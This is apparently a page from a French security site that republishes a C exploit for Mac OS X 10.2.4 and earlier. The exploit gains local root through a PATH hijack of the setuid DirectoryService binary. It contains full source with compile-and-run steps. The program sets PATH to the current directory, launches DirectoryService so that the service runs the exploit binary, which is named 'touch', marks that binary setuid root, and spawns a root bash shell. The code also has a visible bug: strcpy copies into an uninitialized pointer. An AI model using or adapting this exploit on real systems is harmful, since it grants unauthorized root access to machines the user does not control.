OS X <= 10.2.4 DirectoryService local root PATH exploit

    
 
     
                              * Version TXT Disponible ici *
                              
/* 
                              OS X <= 10.2.4 DirectoryService local root PATH exploit
                              DirectoryService must be crashed prior to execution, per
                              @stake advisory.  If you discover how to crash DirectoryService
                              e-mail me at   [Neeko Oni]

                              --
                              Assuming DirectoryService has been crashed/killed, compile
                              this code as 'touch' (gcc osxds.c -o touch) and execute.

                              bash$ ./touch
                              *bunch of stuff here*
                              euid is root.
                              bash#

                              */

                              #include 
                              #include 
                              #include 
                              #include 

                              int 
                              main(int argc, char **argv)
                              {
                              char           *ORIGPATH;
                              int             temp;
                              if (argc < 2) {
                              if (geteuid() == 0) {
                              printf("euid is root.\n");
                              setuid(0);
                              execl("/bin/bash", "bash", NULL);
                              }
                              strcpy(ORIGPATH, getenv("PATH"));
                              printf("Original path: %s\n", ORIGPATH);
                              setenv("PATH", ".", 1);
                              printf("New path: %s\n", getenv("PATH"));
                              printf("Executing DirectoryService with false PATH...\n");
                              if (fork() == 0) {
                              execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
                              }
                              printf("Forked DirectoryService, pausing before shell exec...\n");
                              sleep(3);
                              printf("Cross your fingers.\n");
                              setenv("PATH", ORIGPATH, 1);
                              printf("Path restored: %s\n", getenv("PATH"));
                              execl("./touch", "touch", NULL);            
                              }
                              system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
                              }
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits